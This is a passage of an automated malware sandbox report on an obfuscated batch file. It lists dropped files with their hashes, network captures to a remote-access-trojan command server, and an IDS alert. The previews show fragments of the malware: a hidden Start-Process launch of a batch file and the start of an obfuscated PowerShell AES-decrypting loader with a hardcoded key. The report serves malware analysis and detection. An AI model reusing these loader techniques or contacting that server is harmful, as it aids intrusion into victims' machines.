SSDEEP:	192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
MD5:	5D63AFB3EA60A7655FF95B4DB1B451E0
SHA1:	B5D236316CC6617071D83D7E1B4367DDA1A889B1
SHA-256:	815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
SHA-512:	C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
Malicious:	false
Preview:	ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3430716270609357
Encrypted:	false
SSDEEP:	768:hvEpP9JcY6+g4+Ga6ozR313xIb13xIb13xIt13xI:hspP9JcY6+g4+Ga6
MD5:	1D24384BB963B9F4A0F4612A2D00DB76
SHA1:	9DF5AE983341966DF5D47D766C3D0EB867CA498D
SHA-256:	EFBF2805180CF650B62236A2E766391DC7E80A82E742C88729822E9F230D2B2E
SHA-512:	16A79FF507631A74B11FBE5C0DD27A76A0C4C1AFC7867B87D3863326AF71BD1407CDC4A9C123C09928D58FE9DFC96EC68F818AE317780C8BCB5015624EE867C7
Malicious:	false
Preview:	ElfChnk.....................................x ..."....d....................................................................]..m................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................^.......3...............................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.364133037256648
Encrypted:	false
SSDEEP:	384:dZhlR0CsRNHrRhR0yRp+RiRRhRahARh1ZFRbmXR9XPRFrRXVRcrRb8RWRrR4QRSH:dZi4VYHm3X3NI538LMi
MD5:	C21784B5B442FCE64BEEF6DA67C578AA
SHA1:	729FDCBCF7A177A74D6B199885C3C6B078BEDE7B
SHA-256:	F01270056ACDCABF13F7A1F84D8F9D1DDDB195E38C5BF54FDAE5AB65A680D22A
SHA-512:	AB53904FE1C3DE09EE053FCA9842B8937279249CFD7038AD757786810580C391F0B947C0FFFEBB3597DE18C31E099441BBE2048AA0D565C08283BE6B60B2880A
Malicious:	false
Preview:	ElfChnk.J.......P.......J.......P............ ..p%...Fq.....................................................................z.TA....................C.......Q...........N...=.......................................0"..d.......................7#..........................................?.......(...f...+...........?....................... .......................M...F...............................................&............................................................".....................................*......J.........l.f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.282820835556058
Encrypted:	false
SSDEEP:	384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
MD5:	7DB7567819F7CFC6955126B8306826E6
SHA1:	45CCB1C41CA1C6E1384207444A8B84437408DF1A
SHA-256:	0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
SHA-512:	FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
Malicious:	false
Preview:	ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.232783163157918
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
MD5:	71A005B17A2D32C10709277023D447E6
SHA1:	14754F04007D539159F75D62AACC6A282CAA8D54
SHA-256:	6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
SHA-512:	BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.212347920822981
Encrypted:	false
SSDEEP:	384:mhZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQe:mOsc6QNqObxKhryS3qes
MD5:	4E09108C8B12FC472889A87DA99C0808
SHA1:	2E587E8428EAEA5E6D3DDF48121C196D17FB19C5
SHA-256:	E7D54C3596EA512C179B5CD24F79252B65FCDB7D3C4F47F768AC6CF3AEB5E3DE
SHA-512:	989F17EBC39A6388D84D5B00E13F152E117B2E12A2F55D67EF0D00577DEB5B0FDC2DEE7022CEC3150C6AA8A95BD8A223B32C6EB58A364329271D694673CCEDC7
Malicious:	false
Preview:	ElfChnk.^.......m.......^.......m...........@;..p>...H,.....................................................................k.t.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.414298413407747
Encrypted:	false
SSDEEP:	384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
MD5:	77D9AFD001F6BBD592C19652D671FEA3
SHA1:	B87EA73299713B00D44A123C4B48636957EA90CE
SHA-256:	E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
SHA-512:	C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
Malicious:	false
Preview:	ElfChnk.........................................8...,..t......................................................................>.......................................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................*..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69808
Entropy (8bit):	4.377655545940823
Encrypted:	false
SSDEEP:	384:EoiXLoCGUoMXoiX3oiXaoiXCoiXEFR6nBKSWDXxo+MtSGoRMtXo+bd4okto2wJop:t3IAeIGtaryVpxy
MD5:	5B5D4EAC095975929C18B2DC53CACED1
SHA1:	807E6A04AC31A3BC2F7AF38AE5E501D339B8BA7D
SHA-256:	0F8AD1FBB7DB8A60D226D004E36EBC3E6D5108A7D1853C857E3CBD922BDB67C1
SHA-512:	1C8DCB546C49ECA7F8CBB01300C9741518BE257F6677B6400EE204D6B433E09D6AEE2F655303AAE752B023B175C8E7C1A9AEC5CFE7AD8294C18CFC466858DC7B
Malicious:	false
Preview:	ElfChnk............................................uat6....................................................................-..................d...s...h...................=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...................S4.......:..=.......................................................................F.......&........................"......**...............K.x...........Z..F...............................................................F.............!....6.......... ..K.x......;.}.I...V...x.................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B."......................N...........................................$.N......h.u.b.e.r.t...H.U.B.E.R.T.-.P.C....0......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.r.d.s.s.i.i.o.v.y.b.c.p.m.m...........%

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.422828418420659
Encrypted:	false
SSDEEP:	384:wFRzHL4B5W2HuK0PJjfJD9q1G3zm2foww/0w/DOrTKM1d7eRZ9OhPFCgURSLFu/7:GBCjMo46/iP6f/Y14RKe+PH+Yekm
MD5:	7F6ED6D154200FF5ECC8EAD4F2294FD6
SHA1:	8BC11AA131EDDAB364110C64C49DAE9A19D5950B
SHA-256:	79BD0D1963D0872956063A00CA59D53918D27EB2028A05661382C92113AC0F2C
SHA-512:	435A4471677ADD89AB0D965FA8D12EC4BB0FD7A1C9423927C702E89E18C55BC3FE687EEC55DE4D01A71191A4CF43F18EFB71904F155899C145C5417C17302CFB
Malicious:	false
Preview:	ElfChnk.............................................L1........................................................................g.................F...s...h...............n...=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:.......................................................................................................&... ...........................&.......**...............J.Q...........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79744
Entropy (8bit):	3.7068711889762676
Encrypted:	false
SSDEEP:	768:laG5ZEDByI+ngKIIs4aG5ZEDByI+ngKIIs5G5ZEDByI+ngKIIs2G5ZEDByI+ngKs:TgKE8gKEKgKE1gKE4gKEJgKEaR
MD5:	29FEBEA7B911968FADA355AB51EE030D
SHA1:	6C47E2E101448872A42960B051CB27D9AA1D5E5E
SHA-256:	6DE7B13E9291C205F1EEB9078D3902FC55B6E855FE6CFDFD03E476D40F8A8599
SHA-512:	9BE2B68FA0F6539E939B71EDB8D7F435256938F98DA084A881F0EC02BB976E7A0B4A19398FCB75120BF42B983E26FCDE5120C3F0362B1509DDB0839C2B717936
Malicious:	false
Preview:	ElfChnk.%.......%................................7..,F+.....................................................................Lh..............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**...5............P...........!j..&.......!j....:Tc`.)..h........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_jvcxvuyp.ep0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_sbacdivv.ibu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.373068424426035
Encrypted:	false
SSDEEP:	6144:lFVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:DV1qyWWI/glMM6kF7Pq
MD5:	A0B86CA76237CA92EBC21604ED2A99F0
SHA1:	CC71DA4785375D2CA3D3D8B33432EC2CEE134790
SHA-256:	BB12362BF564B38212E247DF82A18C86A8323F3111140CF7CB2667635E724EFF
SHA-512:	3CF2A0F66038DFDD907452D9759C1FB0330EA20D080B211420B1C43AC0D3B82FBA1068B4800C9819F6FCB20FD1B394CB07C2EA4DC91637A06929371F34F7B155
Malicious:	false
Preview:	regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.,;Y................................................................................................................................................................................................................................................................................................................................................'c,m........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.84935141926561
Encrypted:	false
SSDEEP:	3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
MD5:	D8C4F9FD5B972AE487170EA993933179
SHA1:	32E61F1DD8A462CEDC6B7A636275363B011ABDA9
SHA-256:	728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
SHA-512:	1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
Malicious:	false
Preview:	Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2693), with CRLF line terminators
Category:	dropped
Size (bytes):	2840
Entropy (8bit):	5.282056615422855
Encrypted:	false
SSDEEP:	48:9JFHDRwRBRBRxhB3AnB3qq8ViQ3lXtvU595f8bLbWp1ccCvuvc1slZaWWiHkKWi/:PFHDRwnL7hBUB6qt6Z9U595f8bZ3vu0Y
MD5:	35B51E785F1C9C70CB225E3DC65BB389
SHA1:	B42E4EA404098816AB61D34C1CF0FA781A925B83
SHA-256:	549563CF6E615F5D9D785B2698A7E97AEA141B7209954DCA2F01C60067550509
SHA-512:	06C0EEF7C94E81A5DE6E855434056C0E5AA359FC75E192126E915B709C2047B9805A45A7373DFF58A8A50EC2A7712972E55CC4137691D2A333F5D41B24118965
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function PNNxp($qgBgH){.$eOCgk=[System.Security.Cryptography.Aes]::Create();.$eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk=');.$eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A==');.$HrolG=$eOCgk.CreateDecryptor();.$IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length);.$HrolG.Dispose();.$eOCgk.Dispose();.$IcZIb;}function YVagc($qgBgH){.Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', '');.Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktbl

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (5479), with CRLF line terminators
Entropy (8bit):	6.008970376557102
TrID:
File name:	1 (2).cmd
File size:	5'285'337 bytes
MD5:	64d17cf4e56c0fdc93365eb17914ce39
SHA1:	4861be8ba1ba6d567f9950390f290bb8b860ccae
SHA256:	7a83a44720d94be24a8e7745d6871d65afda849c4008ab72511dd5ac38c7378c
SHA512:	a905de2fdc70937b91584f24358766599f733e7204578b60f64e47d523696d93b14b8aee3b1e5822b6eb0602a248c326c6305d96375f4069f7462cbd1ec4c21c
SSDEEP:	49152:SW2HHBORwlR4IStoWhlWSPH4HCIhUm9wfE+0yd8aWacLhMrdOe8f8:9
TLSH:	F036F11F22C7EA3B0A710A487875127FB79C0DCCA427688E1D7467F963BD7E81616368
File Content Preview:	@echo off..%^%@%COIlBAlHvUDRWINcSFZvWKuWZahIRAnNuSvgrVABydeUMpExUFwUaHASuLlBtCPUHQwenHKXeyWSFAkKvJOmdsNMrCLFJZhVnjmWSAjmUzPCKHnUBBfJODRocJMLWenfqaFwnnRVzCrDDlbJpReiUyhJrYUjNyqQmKlJ%%^%e%QGoKjjlmoKRHdweaekSTVeotIhbmBrTZsHykPyLoWxdncBKclQhztQhMsUbbiZLXRRpvY

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T14:55:20.913610+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	154.216.20.132	6969	192.168.2.8	63301	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 14:55:20.226854086 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:20.231822968 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:20.231914997 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:20.237910986 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:20.242785931 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:20.903786898 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:20.903816938 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:20.903877974 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:20.908752918 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:20.913609982 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:21.111813068 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:21.161123037 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:22.200028896 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:22.200059891 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:22.200114965 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:22.201021910 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:22.201045990 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.051754951 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.051846027 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:23.055996895 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:23.056015015 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.056289911 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.060132027 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:23.107403040 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.273268938 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.273338079 CEST	443	63304	195.201.57.90	192.168.2.8
Oct 3, 2024 14:55:23.273494959 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:23.368804932 CEST	63304	443	192.168.2.8	195.201.57.90
Oct 3, 2024 14:55:23.544528961 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:23.549355984 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:23.549890041 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:23.554701090 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:23.909399033 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:23.973618984 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:24.070441961 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:24.176755905 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:30.384367943 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:30.426775932 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:30.539252043 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:30.543550968 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:30.548536062 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:30.548916101 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:30.553755999 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.385633945 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.442374945 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.542889118 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.583000898 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.625154972 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.625206947 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.631311893 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631582975 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631616116 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631638050 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.631668091 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631675005 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.631697893 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631748915 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631752968 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.631778002 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631805897 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.631834984 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.631851912 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.635468960 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.635524035 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.635653973 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.635680914 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.635735035 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.636897087 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.636948109 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.636980057 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637006044 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.637031078 CEST	63301	6969	192.168.2.8	154.216.20.132
Oct 3, 2024 14:55:31.637032032 CEST	6969	63301	154.216.20.132	192.168.2.8
Oct 3, 2024 14:55:31.637064934 CEST	6969	63301	154.216.20.132	192.168.2.8
